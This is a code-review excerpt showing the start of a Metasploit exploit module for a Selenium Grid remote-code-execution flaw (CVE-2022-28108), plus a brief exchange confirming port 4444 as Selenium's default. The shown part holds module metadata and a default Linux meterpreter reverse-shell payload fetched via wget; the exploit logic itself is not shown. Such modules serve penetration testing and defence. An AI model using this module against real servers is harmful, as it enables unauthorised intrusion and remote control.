modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+require 'uri'
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Selenium chrome RCE',
+        'Description' => %q{
+          Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+          such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+        },
+        'Author' => [
+          'randomstuff (Gabriel Corona)', # Exploit development
+          'Wiz Research',                 # Vulnerability research
+          'Takahiro Yokoyama'             # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-28108'],
+          ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
+          ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-18',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(4444),
```

Comment:
Is this a default port for Selenium? If not, is there a common port for Selenium? If not, this should be removed.

Reply:
Port 4444 is the default port for Selenium Grid, so I'll leave it as it is. Thanks!